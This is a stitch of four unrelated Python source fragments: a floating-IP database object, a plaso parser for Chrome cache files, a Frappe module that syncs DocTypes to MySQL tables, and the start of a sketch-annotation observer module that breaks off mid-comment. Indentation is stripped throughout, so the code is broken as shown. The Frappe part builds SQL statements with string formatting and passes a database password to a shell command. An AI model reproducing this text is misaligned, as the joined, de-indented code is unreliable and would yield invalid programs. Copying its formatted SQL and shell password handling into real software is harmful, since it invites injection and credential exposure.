if result['fixed_ip_address'] is not None:
result['fixed_ip_address'] = cls.filter_to_str(
result['fixed_ip_address'])
if 'floating_ip_address' in result:
result['floating_ip_address'] = cls.filter_to_str(
result['floating_ip_address'])
return result
@classmethod
def get_scoped_floating_ips(cls, context, router_ids):
query = context.session.query(l3.FloatingIP,
models_v2.SubnetPool.address_scope_id)
query = query.join(models_v2.Port,
l3.FloatingIP.fixed_port_id == models_v2.Port.id)
# Outer join of Subnet can cause each ip to have more than one row.
query = query.outerjoin(models_v2.Subnet,
models_v2.Subnet.network_id == models_v2.Port.network_id)
query = query.filter(models_v2.Subnet.ip_version == 4)
query = query.outerjoin(models_v2.SubnetPool,
models_v2.Subnet.subnetpool_id == models_v2.SubnetPool.id)
# Filter out on router_ids
query = query.filter(l3.FloatingIP.router_id.in_(router_ids))
return cls._unique_floatingip_iterator(context, query)
@classmethod
def _unique_floatingip_iterator(cls, context, query):
"""Iterates over only one row per floating ip. Ignores others."""
# Group rows by fip id. They must be sorted by same.
q = query.order_by(l3.FloatingIP.id)
keyfunc = lambda row: row[0]['id']
group_iterator = itertools.groupby(q, keyfunc)
# Just hit the first row of each group
for key, value in group_iterator:
row = [r for r in six.next(value)]
yield (cls._load_object(context, row[0]), row[1])
| |
# -*- coding: utf-8 -*-
"""Parser for Google Chrome and Chromium Cache files."""
from __future__ import unicode_literals
import os
from dfdatetime import webkit_time as dfdatetime_webkit_time
from dfvfs.resolver import resolver as path_spec_resolver
from dfvfs.path import factory as path_spec_factory
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.parsers import dtfabric_parser
from plaso.parsers import interface
from plaso.parsers import manager
class CacheAddress(object):
"""Chrome cache address.
Attributes:
block_number (int): block data file number.
block_offset (int): offset within the block data file.
block_size (int): block size.
filename (str): name of the block data file.
value (int): cache address.
"""
FILE_TYPE_SEPARATE = 0
FILE_TYPE_BLOCK_RANKINGS = 1
FILE_TYPE_BLOCK_256 = 2
FILE_TYPE_BLOCK_1024 = 3
FILE_TYPE_BLOCK_4096 = 4
_BLOCK_DATA_FILE_TYPES = [
FILE_TYPE_BLOCK_RANKINGS,
FILE_TYPE_BLOCK_256,
FILE_TYPE_BLOCK_1024,
FILE_TYPE_BLOCK_4096]
_FILE_TYPE_BLOCK_SIZES = [0, 36, 256, 1024, 4096]
def __init__(self, cache_address):
"""Initializes a cache address.
Args:
cache_address (int): cache address.
"""
super(CacheAddress, self).__init__()
self.block_number = None
self.block_offset = None
self.block_size = None
self.filename = None
self.value = cache_address
if cache_address & 0x80000000:
self.is_initialized = 'True'
else:
self.is_initialized = 'False'
self.file_type = (cache_address & 0x70000000) >> 28
if not cache_address == 0x00000000:
if self.file_type == self.FILE_TYPE_SEPARATE:
file_selector = cache_address & 0x0fffffff
self.filename = 'f_{0:06x}'.format(file_selector)
elif self.file_type in self._BLOCK_DATA_FILE_TYPES:
file_selector = (cache_address & 0x00ff0000) >> 16
self.filename = 'data_{0:d}'.format(file_selector)
file_block_size = self._FILE_TYPE_BLOCK_SIZES[self.file_type]
self.block_number = cache_address & 0x0000ffff
self.block_size = (cache_address & 0x03000000) >> 24
self.block_size *= file_block_size
self.block_offset = 8192 + (self.block_number * file_block_size)
class CacheEntry(object):
"""Chrome cache entry.
Attributes:
creation_time (int): creation time, in number of microseconds since
since January 1, 1601, 00:00:00 UTC.
hash (int): super fast hash of the key.
key (bytes): key.
next (int): cache address of the next cache entry.
original_url (str): original URL derived from the key.
rankings_node (int): cache address of the rankings node.
"""
def __init__(self):
"""Initializes a cache entry."""
super(CacheEntry, self).__init__()
self.creation_time = None
self.hash = None
self.key = None
self.next = None
self.original_url = None
self.rankings_node = None
class ChromeCacheIndexFileParser(dtfabric_parser.DtFabricBaseParser):
"""Chrome cache index file parser.
Attributes:
creation_time (int): creation time, in number of number of microseconds
since January 1, 1601, 00:00:00 UTC.
index_table (list[CacheAddress]): the cache addresses which are stored in
the index file.
"""
_DEFINITION_FILE = 'chrome_cache.yaml'
def __init__(self):
"""Initializes an index file."""
super(ChromeCacheIndexFileParser, self).__init__()
self.creation_time = None
self.index_table = []
def _ParseFileHeader(self, file_object):
"""Parses the file header.
Args:
file_object (dfvfs.FileIO): a file-like object to parse.
Raises:
ParseError: if the file header cannot be read.
"""
file_header_map = self._GetDataTypeMap('chrome_cache_index_file_header')
try:
file_header, _ = self._ReadStructureFromFileObject(
file_object, 0, file_header_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError(
'Unable to parse index file header with error: {0!s}'.format(
exception))
format_version = '{0:d}.{1:d}'.format(
file_header.major_version, file_header.minor_version)
if format_version not in ('2.0', '2.1'):
raise errors.ParseError(
'Unsupported index file format version: {0:s}'.format(format_version))
self.creation_time = file_header.creation_time
def _ParseIndexTable(self, file_object):
"""Parses the index table.
Args:
file_object (dfvfs.FileIO): a file-like object to parse.
Raises:
ParseError: if the index table cannot be read.
"""
cache_address_map = self._GetDataTypeMap('uint32le')
file_offset = file_object.get_offset()
cache_address_data = file_object.read(4)
while len(cache_address_data) == 4:
try:
value = self._ReadStructureFromByteStream(
cache_address_data, file_offset, cache_address_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to map cache address at offset: 0x{0:08x} with error: '
'{1!s}').format(file_offset, exception))
if value:
cache_address = CacheAddress(value)
self.index_table.append(cache_address)
file_offset += 4
cache_address_data = file_object.read(4)
def ParseFileObject(self, parser_mediator, file_object):
"""Parses a file-like object.
Args:
parser_mediator (ParserMediator): a parser mediator.
file_object (dfvfs.FileIO): a file-like object to parse.
Raises:
ParseError: when the file cannot be parsed.
"""
try:
self._ParseFileHeader(file_object)
except errors.ParseError as exception:
raise errors.ParseError(
'Unable to parse index file header with error: {0!s}'.format(
exception))
# Skip over the LRU data, which is 112 bytes in size.
file_object.seek(112, os.SEEK_CUR)
self._ParseIndexTable(file_object)
class ChromeCacheDataBlockFileParser(dtfabric_parser.DtFabricBaseParser):
"""Chrome cache data block file parser."""
_DEFINITION_FILE = 'chrome_cache.yaml'
def _ParseFileHeader(self, file_object):
"""Parses the file header.
Args:
file_object (dfvfs.FileIO): a file-like object to parse.
Raises:
ParseError: if the file header cannot be read.
"""
file_header_map = self._GetDataTypeMap(
'chrome_cache_data_block_file_header')
try:
file_header, _ = self._ReadStructureFromFileObject(
file_object, 0, file_header_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError(
'Unable to parse data block file header with error: {0!s}'.format(
exception))
format_version = '{0:d}.{1:d}'.format(
file_header.major_version, file_header.minor_version)
if format_version not in ('2.0', '2.1'):
raise errors.ParseError(
'Unsupported data block file format version: {0:s}'.format(
format_version))
if file_header.block_size not in (256, 1024, 4096):
raise errors.ParseError(
'Unsupported data block file block size: {0:d}'.format(
file_header.block_size))
def ParseCacheEntry(self, file_object, block_offset):
"""Parses a cache entry.
Args:
file_object (dfvfs.FileIO): a file-like object to read from.
block_offset (int): block offset of the cache entry.
Returns:
CacheEntry: cache entry.
Raises:
ParseError: if the cache entry cannot be read.
"""
cache_entry_map = self._GetDataTypeMap('chrome_cache_entry')
try:
cache_entry, _ = self._ReadStructureFromFileObject(
file_object, block_offset, cache_entry_map)
except (ValueError, errors.ParseError) as exception:
raise errors.ParseError((
'Unable to parse cache entry at offset: 0x{0:08x} with error: '
'{1!s}').format(block_offset, exception))
cache_entry_object = CacheEntry()
cache_entry_object.hash = cache_entry.hash
cache_entry_object.next = CacheAddress(cache_entry.next_address)
cache_entry_object.rankings_node = CacheAddress(
cache_entry.rankings_node_address)
cache_entry_object.creation_time = cache_entry.creation_time
byte_array = cache_entry.key
byte_string = bytes(bytearray(byte_array))
cache_entry_object.key, _, _ = byte_string.partition(b'\x00')
try:
cache_entry_object.original_url = cache_entry_object.key.decode('ascii')
except UnicodeDecodeError as exception:
raise errors.ParseError(
'Unable to decode original URL in key with error: {0!s}'.format(
exception))
return cache_entry_object
# pylint: disable=unused-argument
def ParseFileObject(self, parser_mediator, file_object):
"""Parses a file-like object.
Args:
parser_mediator (ParserMediator): a parser mediator.
file_object (dfvfs.FileIO): a file-like object to parse.
Raises:
ParseError: when the file cannot be parsed.
"""
self._ParseFileHeader(file_object)
class ChromeCacheEntryEventData(events.EventData):
"""Chrome Cache event data.
Attributes:
original_url (str): original URL.
"""
DATA_TYPE = 'chrome:cache:entry'
def __init__(self):
"""Initializes event data."""
super(ChromeCacheEntryEventData, self).__init__(data_type=self.DATA_TYPE)
self.original_url = None
class ChromeCacheParser(interface.FileEntryParser):
"""Parses Chrome Cache files."""
NAME = 'chrome_cache'
DATA_FORMAT = 'Google Chrome or Chromium Cache file'
def __init__(self):
"""Initializes a Chrome Cache files parser."""
super(ChromeCacheParser, self).__init__()
self._data_block_file_parser = ChromeCacheDataBlockFileParser()
def _ParseCacheEntries(self, parser_mediator, index_table, data_block_files):
"""Parses Chrome Cache file entries.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
index_table (list[CacheAddress]): the cache addresses which are stored in
the index file.
data_block_files (dict[str: file]): look up table for the data block
file-like object handles.
"""
# Parse the cache entries in the data block files.
for cache_address in index_table:
cache_address_chain_length = 0
while cache_address.value != 0:
if cache_address_chain_length >= 64:
parser_mediator.ProduceExtractionWarning(
'Maximum allowed cache address chain length reached.')
break
data_block_file_object = data_block_files.get(
cache_address.filename, None)
if not data_block_file_object:
message = 'Cache address: 0x{0:08x} missing data file.'.format(
cache_address.value)
parser_mediator.ProduceExtractionWarning(message)
break
try:
cache_entry = self._data_block_file_parser.ParseCacheEntry(
data_block_file_object, cache_address.block_offset)
except (IOError, errors.ParseError) as exception:
parser_mediator.ProduceExtractionWarning(
'Unable to parse cache entry with error: {0!s}'.format(
exception))
break
event_data = ChromeCacheEntryEventData()
event_data.original_url = cache_entry.original_url
date_time = dfdatetime_webkit_time.WebKitTime(
timestamp=cache_entry.creation_time)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_LAST_VISITED)
parser_mediator.ProduceEventWithEventData(event, event_data)
cache_address = cache_entry.next
cache_address_chain_length += 1
def _ParseIndexTable(
self, parser_mediator, file_system, file_entry, index_table):
"""Parses a Chrome Cache index table.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_system (dfvfs.FileSystem): file system.
file_entry (dfvfs.FileEntry): file entry.
index_table (list[CacheAddress]): the cache addresses which are stored in
the index file.
"""
# Build a lookup table for the data block files.
path_segments = file_system.SplitPath(file_entry.path_spec.location)
data_block_files = {}
for cache_address in index_table:
if cache_address.filename not in data_block_files:
# Remove the previous filename from the path segments list and
# add one of the data block files.
path_segments.pop()
path_segments.append(cache_address.filename)
# We need to pass only used arguments to the path specification
# factory otherwise it will raise.
kwargs = {}
if file_entry.path_spec.parent:
kwargs['parent'] = file_entry.path_spec.parent
kwargs['location'] = file_system.JoinPath(path_segments)
data_block_file_path_spec = path_spec_factory.Factory.NewPathSpec(
file_entry.path_spec.TYPE_INDICATOR, **kwargs)
try:
data_block_file_entry = path_spec_resolver.Resolver.OpenFileEntry(
data_block_file_path_spec)
except RuntimeError as exception:
message = (
'Unable to open data block file: {0:s} with error: '
'{1!s}'.format(kwargs['location'], exception))
parser_mediator.ProduceExtractionWarning(message)
data_block_file_entry = None
if not data_block_file_entry:
message = 'Missing data block file: {0:s}'.format(
cache_address.filename)
parser_mediator.ProduceExtractionWarning(message)
data_block_file_object = None
else:
data_block_file_object = data_block_file_entry.GetFileObject()
try:
self._data_block_file_parser.ParseFileObject(
parser_mediator, data_block_file_object)
except (IOError, errors.ParseError) as exception:
message = (
'Unable to parse data block file: {0:s} with error: '
'{1!s}').format(cache_address.filename, exception)
parser_mediator.ProduceExtractionWarning(message)
data_block_file_object.close()
data_block_file_object = None
data_block_files[cache_address.filename] = data_block_file_object
try:
self._ParseCacheEntries(
parser_mediator, index_table, data_block_files)
finally:
for data_block_file_object in data_block_files.values():
if data_block_file_object:
data_block_file_object.close()
def ParseFileEntry(self, parser_mediator, file_entry):
"""Parses Chrome Cache files.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_entry (dfvfs.FileEntry): file entry.
Raises:
UnableToParseFile: when the file cannot be parsed.
"""
index_file_parser = ChromeCacheIndexFileParser()
file_object = file_entry.GetFileObject()
if not file_object:
display_name = parser_mediator.GetDisplayName()
raise errors.UnableToParseFile(
'[{0:s}] unable to parse index file {1:s}'.format(
self.NAME, display_name))
try:
index_file_parser.ParseFileObject(parser_mediator, file_object)
except (IOError, errors.ParseError) as exception:
file_object.close()
display_name = parser_mediator.GetDisplayName()
raise errors.UnableToParseFile(
'[{0:s}] unable to parse index file {1:s} with error: {2!s}'.format(
self.NAME, display_name, exception))
# TODO: create event based on index file creation time.
try:
file_system = file_entry.GetFileSystem()
self._ParseIndexTable(
parser_mediator, file_system, file_entry,
index_file_parser.index_table)
finally:
file_object.close()
manager.ParsersManager.RegisterParser(ChromeCacheParser)
| |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Syncs a database table to the `DocType` (metadata)
.. note:: This module is only used internally
"""
import re
import os
import frappe
from frappe import _
from frappe.utils import cstr, cint, flt
import MySQLdb
class InvalidColumnName(frappe.ValidationError): pass
varchar_len = '140'
standard_varchar_columns = ('name', 'owner', 'modified_by', 'parent', 'parentfield', 'parenttype')
type_map = {
'Currency': ('decimal', '18,6')
,'Int': ('int', '11')
,'Float': ('decimal', '18,6')
,'Percent': ('decimal', '18,6')
,'Check': ('int', '1')
,'Small Text': ('text', '')
,'Long Text': ('longtext', '')
,'Code': ('longtext', '')
,'Text Editor': ('longtext', '')
,'Date': ('date', '')
,'Datetime': ('datetime', '6')
,'Time': ('time', '6')
,'Text': ('text', '')
,'Data': ('varchar', varchar_len)
,'Link': ('varchar', varchar_len)
,'Dynamic Link':('varchar', varchar_len)
,'Password': ('varchar', varchar_len)
,'Select': ('varchar', varchar_len)
,'Read Only': ('varchar', varchar_len)
,'Attach': ('text', '')
,'Attach Image':('text', '')
}
default_columns = ['name', 'creation', 'modified', 'modified_by', 'owner',
'docstatus', 'parent', 'parentfield', 'parenttype', 'idx']
optional_columns = ["_user_tags", "_comments", "_assign", "_liked_by"]
default_shortcuts = ['_Login', '__user', '_Full Name', 'Today', '__today', "now", "Now"]
def updatedb(dt, meta=None):
"""
Syncs a `DocType` to the table
* creates if required
* updates columns
* updates indices
"""
res = frappe.db.sql("select issingle from tabDocType where name=%s", (dt,))
if not res:
raise Exception, 'Wrong doctype "%s" in updatedb' % dt
if not res[0][0]:
tab = DbTable(dt, 'tab', meta)
tab.validate()
frappe.db.commit()
tab.sync()
frappe.db.begin()
class DbTable:
def __init__(self, doctype, prefix = 'tab', meta = None):
self.doctype = doctype
self.name = prefix + doctype
self.columns = {}
self.current_columns = {}
self.meta = meta
if not self.meta:
self.meta = frappe.get_meta(self.doctype)
# lists for change
self.add_column = []
self.change_type = []
self.add_index = []
self.drop_index = []
self.set_default = []
# load
self.get_columns_from_docfields()
def validate(self):
"""Check if change in varchar length isn't truncating the columns"""
if self.is_new():
return
self.get_columns_from_db()
columns = [frappe._dict({"fieldname": f, "fieldtype": "Data"}) for f in standard_varchar_columns]
columns += self.columns.values()
for col in columns:
if col.fieldtype in type_map and type_map[col.fieldtype][0]=="varchar":
# validate length range
new_length = cint(col.length) or cint(varchar_len)
if not (1 <= new_length <= 255):
frappe.throw(_("Length of {0} should be between 1 and 255").format(col.fieldname))
try:
# check for truncation
max_length = frappe.db.sql("""select max(char_length(`{fieldname}`)) from `tab{doctype}`"""\
.format(fieldname=col.fieldname, doctype=self.doctype))
except MySQLdb.OperationalError, e:
if e.args[0]==1054:
# Unknown column 'column_name' in 'field list'
continue
else:
raise
if max_length and max_length[0][0] > new_length:
current_type = self.current_columns[col.fieldname]["type"]
current_length = re.findall('varchar\(([\d]+)\)', current_type)
if not current_length:
# case when the field is no longer a varchar
continue
current_length = current_length[0]
if col.fieldname in self.columns:
self.columns[col.fieldname].length = current_length
frappe.msgprint(_("Reverting length to {0} for '{1}' in '{2}'; Setting the length as {3} will cause truncation of data.")\
.format(current_length, col.fieldname, self.doctype, new_length))
def sync(self):
if self.is_new():
self.create()
else:
self.alter()
def is_new(self):
return self.name not in DbManager(frappe.db).get_tables_list(frappe.db.cur_db_name)
def create(self):
add_text = ''
# columns
column_defs = self.get_column_definitions()
if column_defs: add_text += ',\n'.join(column_defs) + ',\n'
# index
index_defs = self.get_index_definitions()
if index_defs: add_text += ',\n'.join(index_defs) + ',\n'
# create table
frappe.db.sql("""create table `%s` (
name varchar({varchar_len}) not null primary key,
creation datetime(6),
modified datetime(6),
modified_by varchar({varchar_len}),
owner varchar({varchar_len}),
docstatus int(1) not null default '0',
parent varchar({varchar_len}),
parentfield varchar({varchar_len}),
parenttype varchar({varchar_len}),
idx int(8) not null default '0',
%sindex parent(parent))
ENGINE=InnoDB
ROW_FORMAT=COMPRESSED
CHARACTER SET=utf8mb4
COLLATE=utf8mb4_unicode_ci""".format(varchar_len=varchar_len) % (self.name, add_text))
def get_column_definitions(self):
column_list = [] + default_columns
ret = []
for k in self.columns.keys():
if k not in column_list:
d = self.columns[k].get_definition()
if d:
ret.append('`'+ k+ '` ' + d)
column_list.append(k)
return ret
def get_index_definitions(self):
ret = []
for key, col in self.columns.items():
if col.set_index and col.fieldtype in type_map and \
type_map.get(col.fieldtype)[0] not in ('text', 'longtext'):
ret.append('index `' + key + '`(`' + key + '`)')
return ret
def get_columns_from_docfields(self):
"""
get columns from docfields and custom fields
"""
fl = frappe.db.sql("SELECT * FROM tabDocField WHERE parent = %s", self.doctype, as_dict = 1)
lengths = {}
precisions = {}
uniques = {}
# optional fields like _comments
if not self.meta.istable:
for fieldname in optional_columns:
fl.append({
"fieldname": fieldname,
"fieldtype": "Text"
})
# add _seen column if track_seen
if getattr(self.meta, 'track_seen', False):
fl.append({
'fieldname': '_seen',
'fieldtype': 'Text'
})
if not frappe.flags.in_install_db and frappe.flags.in_install != "frappe":
custom_fl = frappe.db.sql("""\
SELECT * FROM `tabCustom Field`
WHERE dt = %s AND docstatus < 2""", (self.doctype,), as_dict=1)
if custom_fl: fl += custom_fl
# apply length, precision and unique from property setters
for ps in frappe.get_all("Property Setter", fields=["field_name", "property", "value"],
filters={
"doc_type": self.doctype,
"doctype_or_field": "DocField",
"property": ["in", ["precision", "length", "unique"]]
}):
if ps.property=="length":
lengths[ps.field_name] = cint(ps.value)
elif ps.property=="precision":
precisions[ps.field_name] = cint(ps.value)
elif ps.property=="unique":
uniques[ps.field_name] = cint(ps.value)
for f in fl:
self.columns[f['fieldname']] = DbColumn(self, f['fieldname'],
f['fieldtype'], lengths.get(f["fieldname"]) or f.get('length'), f.get('default'), f.get('search_index'),
f.get('options'), uniques.get(f["fieldname"], f.get('unique')), precisions.get(f['fieldname']) or f.get('precision'))
def get_columns_from_db(self):
self.show_columns = frappe.db.sql("desc `%s`" % self.name)
for c in self.show_columns:
self.current_columns[c[0]] = {'name': c[0],
'type':c[1], 'index':c[3]=="MUL", 'default':c[4], "unique":c[3]=="UNI"}
# GET foreign keys
def get_foreign_keys(self):
fk_list = []
txt = frappe.db.sql("show create table `%s`" % self.name)[0][1]
for line in txt.split('\n'):
if line.strip().startswith('CONSTRAINT') and line.find('FOREIGN')!=-1:
try:
fk_list.append((line.split('`')[3], line.split('`')[1]))
except IndexError:
pass
return fk_list
# Drop foreign keys
def drop_foreign_keys(self):
if not self.drop_foreign_key:
return
fk_list = self.get_foreign_keys()
# make dictionary of constraint names
fk_dict = {}
for f in fk_list:
fk_dict[f[0]] = f[1]
# drop
for col in self.drop_foreign_key:
frappe.db.sql("set foreign_key_checks=0")
frappe.db.sql("alter table `%s` drop foreign key `%s`" % (self.name, fk_dict[col.fieldname]))
frappe.db.sql("set foreign_key_checks=1")
def alter(self):
for col in self.columns.values():
col.build_for_alter_table(self.current_columns.get(col.fieldname, None))
query = []
for col in self.add_column:
query.append("add column `{}` {}".format(col.fieldname, col.get_definition()))
for col in self.change_type:
query.append("change `{}` `{}` {}".format(col.fieldname, col.fieldname, col.get_definition()))
for col in self.add_index:
# if index key not exists
if not frappe.db.sql("show index from `%s` where key_name = %s" %
(self.name, '%s'), col.fieldname):
query.append("add index `{}`(`{}`)".format(col.fieldname, col.fieldname))
for col in self.drop_index:
if col.fieldname != 'name': # primary key
# if index key exists
if frappe.db.sql("""show index from `{0}`
where key_name=%s
and Non_unique=%s""".format(self.name), (col.fieldname, 1 if col.unique else 0)):
query.append("drop index `{}`".format(col.fieldname))
for col in self.set_default:
if col.fieldname=="name":
continue
if col.fieldtype in ("Check", "Int"):
col_default = cint(col.default)
elif col.fieldtype in ("Currency", "Float", "Percent"):
col_default = flt(col.default)
elif not col.default:
col_default = "null"
else:
col_default = '"{}"'.format(col.default.replace('"', '\\"'))
query.append('alter column `{}` set default {}'.format(col.fieldname, col_default))
if query:
try:
frappe.db.sql("alter table `{}` {}".format(self.name, ", ".join(query)))
except Exception, e:
# sanitize
if e.args[0]==1060:
frappe.throw(str(e))
elif e.args[0]==1062:
fieldname = str(e).split("'")[-2]
frappe.throw(_("{0} field cannot be set as unique in {1}, as there are non-unique existing values".format(fieldname, self.name)))
else:
raise e
class DbColumn:
def __init__(self, table, fieldname, fieldtype, length, default,
set_index, options, unique, precision):
self.table = table
self.fieldname = fieldname
self.fieldtype = fieldtype
self.length = length
self.set_index = set_index
self.default = default
self.options = options
self.unique = unique
self.precision = precision
def get_definition(self, with_default=1):
column_def = get_definition(self.fieldtype, precision=self.precision, length=self.length)
if not column_def:
return column_def
if self.fieldtype in ("Check", "Int"):
default_value = cint(self.default) or 0
column_def += ' not null default {0}'.format(default_value)
elif self.fieldtype in ("Currency", "Float", "Percent"):
default_value = flt(self.default) or 0
column_def += ' not null default {0}'.format(default_value)
elif self.default and (self.default not in default_shortcuts) \
and not self.default.startswith(":") and column_def not in ('text', 'longtext'):
column_def += ' default "' + self.default.replace('"', '\"') + '"'
if self.unique and (column_def not in ('text', 'longtext')):
column_def += ' unique'
return column_def
def build_for_alter_table(self, current_def):
column_def = get_definition(self.fieldtype, self.precision, self.length)
# no columns
if not column_def:
return
# to add?
if not current_def:
self.fieldname = validate_column_name(self.fieldname)
self.table.add_column.append(self)
return
# type
if (current_def['type'] != column_def) or \
((self.unique and not current_def['unique']) and column_def not in ('text', 'longtext')):
self.table.change_type.append(self)
else:
# default
if (self.default_changed(current_def) \
and (self.default not in default_shortcuts) \
and not cstr(self.default).startswith(":") \
and not (column_def in ['text','longtext'])):
self.table.set_default.append(self)
# index should be applied or dropped irrespective of type change
if ( (current_def['index'] and not self.set_index and not self.unique)
or (current_def['unique'] and not self.unique) ):
# to drop unique you have to drop index
self.table.drop_index.append(self)
elif (not current_def['index'] and self.set_index) and not (column_def in ('text', 'longtext')):
self.table.add_index.append(self)
def default_changed(self, current_def):
if "decimal" in current_def['type']:
return self.default_changed_for_decimal(current_def)
else:
return current_def['default'] != self.default
def default_changed_for_decimal(self, current_def):
try:
if current_def['default'] in ("", None) and self.default in ("", None):
# both none, empty
return False
elif current_def['default'] in ("", None):
try:
# check if new default value is valid
float(self.default)
return True
except ValueError:
return False
elif self.default in ("", None):
# new default value is empty
return True
else:
# NOTE float() raise ValueError when "" or None is passed
return float(current_def['default'])!=float(self.default)
except TypeError:
return True
class DbManager:
"""
Basically, a wrapper for oft-used mysql commands. like show tables,databases, variables etc...
#TODO:
0. Simplify / create settings for the restore database source folder
0a. Merge restore database and extract_sql(from frappe_server_tools).
1. Setter and getter for different mysql variables.
2. Setter and getter for mysql variables at global level??
"""
def __init__(self,db):
"""
Pass root_conn here for access to all databases.
"""
if db:
self.db = db
def get_variables(self,regex):
"""
Get variables that match the passed pattern regex
"""
return list(self.db.sql("SHOW VARIABLES LIKE '%s'"%regex))
def get_table_schema(self,table):
"""
Just returns the output of Desc tables.
"""
return list(self.db.sql("DESC `%s`"%table))
def get_tables_list(self,target=None):
"""get list of tables"""
if target:
self.db.use(target)
return [t[0] for t in self.db.sql("SHOW TABLES")]
def create_user(self, user, password, host):
#Create user if it doesn't exist.
try:
if password:
self.db.sql("CREATE USER '%s'@'%s' IDENTIFIED BY '%s';" % (user[:16], host, password))
else:
self.db.sql("CREATE USER '%s'@'%s';" % (user[:16], host))
except Exception:
raise
def delete_user(self, target, host):
# delete user if exists
try:
self.db.sql("DROP USER '%s'@'%s';" % (target, host))
except Exception, e:
if e.args[0]==1396:
pass
else:
raise
def create_database(self,target):
if target in self.get_database_list():
self.drop_database(target)
self.db.sql("CREATE DATABASE IF NOT EXISTS `%s` ;" % target)
def drop_database(self,target):
self.db.sql("DROP DATABASE IF EXISTS `%s`;"%target)
def grant_all_privileges(self, target, user, host):
self.db.sql("GRANT ALL PRIVILEGES ON `%s`.* TO '%s'@'%s';" % (target, user, host))
def grant_select_privilges(self, db, table, user, host):
if table:
self.db.sql("GRANT SELECT ON %s.%s to '%s'@'%s';" % (db, table, user, host))
else:
self.db.sql("GRANT SELECT ON %s.* to '%s'@'%s';" % (db, user, host))
def flush_privileges(self):
self.db.sql("FLUSH PRIVILEGES")
def get_database_list(self):
"""get list of databases"""
return [d[0] for d in self.db.sql("SHOW DATABASES")]
def restore_database(self,target,source,user,password):
from frappe.utils import make_esc
esc = make_esc('$ ')
os.system("mysql -u %s -p%s -h%s %s < %s" % \
(esc(user), esc(password), esc(frappe.db.host), esc(target), source))
def drop_table(self,table_name):
"""drop table if exists"""
if not table_name in self.get_tables_list():
return
self.db.sql("DROP TABLE IF EXISTS %s "%(table_name))
def validate_column_name(n):
n = n.replace(' ','_').strip().lower()
special_characters = re.findall("[\W]", n, re.UNICODE)
if special_characters:
special_characters = ", ".join('"{0}"'.format(c) for c in special_characters)
frappe.throw(_("Fieldname {0} cannot have special characters like {1}").format(cstr(n), special_characters), InvalidColumnName)
return n
def remove_all_foreign_keys():
frappe.db.sql("set foreign_key_checks = 0")
frappe.db.commit()
for t in frappe.db.sql("select name from tabDocType where issingle=0"):
dbtab = DbTable(t[0])
try:
fklist = dbtab.get_foreign_keys()
except Exception, e:
if e.args[0]==1146:
fklist = []
else:
raise
for f in fklist:
frappe.db.sql("alter table `tab%s` drop foreign key `%s`" % (t[0], f[1]))
def get_definition(fieldtype, precision=None, length=None):
d = type_map.get(fieldtype)
if not d:
return
coltype = d[0]
size = None
if d[1]:
size = d[1]
if size:
if fieldtype in ["Float", "Currency", "Percent"] and cint(precision) > 6:
size = '21,9'
if coltype == "varchar" and length:
size = length
if size is not None:
coltype = "{coltype}({size})".format(coltype=coltype, size=size)
return coltype
def add_column(doctype, column_name, fieldtype, precision=None):
if column_name in frappe.db.get_table_columns(doctype):
# already exists
return
frappe.db.commit()
frappe.db.sql("alter table `tab%s` add column %s %s" % (doctype,
column_name, get_definition(fieldtype, precision)))
| |
"""
filename: ObserverBase.py
description:
Doctest Examples:
>>> class MyVisualizer(Visualizer):
... def drawAnno(self,anno):
... pass
...
>>> m = MyVisualizer(Annotation)
>>> class MyCollector(Collector):
... def mergeCollections(self,anno):
... pass
...
>>> class Annotation2(Annotation):
... pass
>>> m = MyCollector([Annotation],Annotation2)
"""
#-------------------------------------
import pdb
import math
import time
from Utils import Logger
from Utils import GeomUtils
from SketchFramework.Point import Point
from SketchFramework.Stroke import Stroke
from SketchFramework.Board import BoardObserver, Board
from SketchFramework.Annotation import Annotation, AnnotatableObject
logger = Logger.getLogger('ObserverBase', Logger.WARN )
#-------------------------------------
class Visualizer( BoardObserver ):
"Watches for annotations, draws them"
def __init__(self, board, anno_type):
BoardObserver.__init__(self, board)
self.getBoard().AddBoardObserver( self , [])
self.getBoard().RegisterForAnnotation( anno_type, self )
self.annotation_list = []
def onAnnotationAdded( self, strokes, annotation ):
logger.debug("anno added %s", annotation )
self.annotation_list.append(annotation)
def onAnnotationRemoved(self, annotation):
logger.debug("anno removed %s", annotation )
if annotation in self.annotation_list:
self.annotation_list.remove(annotation)
def drawMyself( self ):
for a in self.annotation_list:
self.drawAnno( a )
def drawAnno( self, anno ):
logger.error("failure to implement virtual method 'drawAnno'")
raise NotImplementedError
#-------------------------------------
anim_logger = Logger.getLogger('Animator', Logger.WARN )
class Animator( Visualizer ):
"Watches for annotations, animates them at about the specified fps. The annotation must "
CALLTIMES = {} #Maps an annotation to the last time it was "stepped"
def __init__(self, board, anno_type = None, fps = 1):
anim_logger.debug("Initializing: Watch for %s" % (anno_type))
if not hasattr(anno_type, "step"):
anim_logger.error("%s must implement 'step'" % (anno_type.__name__))
raise NotImplementedError
Visualizer.__init__(self, board, anno_type)
self.fps = fps
def drawMyself( self ):
"Calls each observed annotation with a step of however many ms since its last call, and then draws the anno"
for a in self.annotation_list:
lastcall = Animator.CALLTIMES.get(a, 1000 * time.time())
anim_logger.debug("Calling %s anno %s ms later" % (a, 1000 * time.time() - lastcall))
a.step( time.time() - lastcall)
anim_logger.debug("Drawing frame for %s" % (a))
self.drawAnno( a )
Animator.CALLTIMES[a] = 1000 * time.time()
def drawAnno( self, anno ):
anim_logger.error("failure to implement virtual method 'drawAnno'")
raise NotImplementedError
#-------------------------------------
class Collector( BoardObserver ):
"Watches for annotations, collects them together into new annotations"
# this assumes that you have some base annotations called "items" (e.g. arrow and circle annotations)
# and that you want to find collections of these items (e.g. directed graphs) and mark them with a big annotation
# according to some rules (e.g. graphs must be "connected" with arrows pointing to circles).
# It also assumes that each item is a valid collection of it's own (e.g. an circle is a graph).
# If this is the case, you just need to implement two functions, collectionFromItem and mergeCollections.
